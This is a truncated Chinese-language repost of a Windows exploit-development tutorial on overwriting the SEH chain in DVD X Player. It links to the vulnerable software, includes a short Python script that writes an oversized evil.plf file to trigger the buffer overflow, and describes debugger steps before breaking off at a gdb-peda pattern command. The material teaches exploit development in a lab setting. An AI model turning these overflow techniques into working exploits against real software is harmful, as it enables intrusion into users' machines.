Windows exploit初探-通过修改seh get shell

    技术2022-07-12  75

    原文地址:https://www.fuzzysecurity.com/tutorials/expDev/3.html 发现看雪有翻译的:https://bbs.pediy.com/user-686289-2.htm

    有漏洞的软件

    链接:https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw 提取码:khmh

    在xp虚拟机里安装上面下载的安装包,然后用下面的脚本创建一个文件,绕后用安装好的软件来打开这个文件,造成缓冲区溢出,覆盖seh链

    filename="evil.plf" buffer = "A"*2000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

    先运行软件,然后debugger attach 上去以后,点击运行。 按下图,打开我们上面用脚本创建好的文件 点击open playlist后,debugger会卡住,此时按shift+F9,继续运行,然后再切换到DVD X Player 可以发现已经成功覆盖了seh链

    使用gdb的peda插件来判断偏移

    gdb-peda$ pattern create 1000 'AAA
    转载请注明原文地址:https://ipadbbs.8miu.com/read-21252.html
    最新回复(0)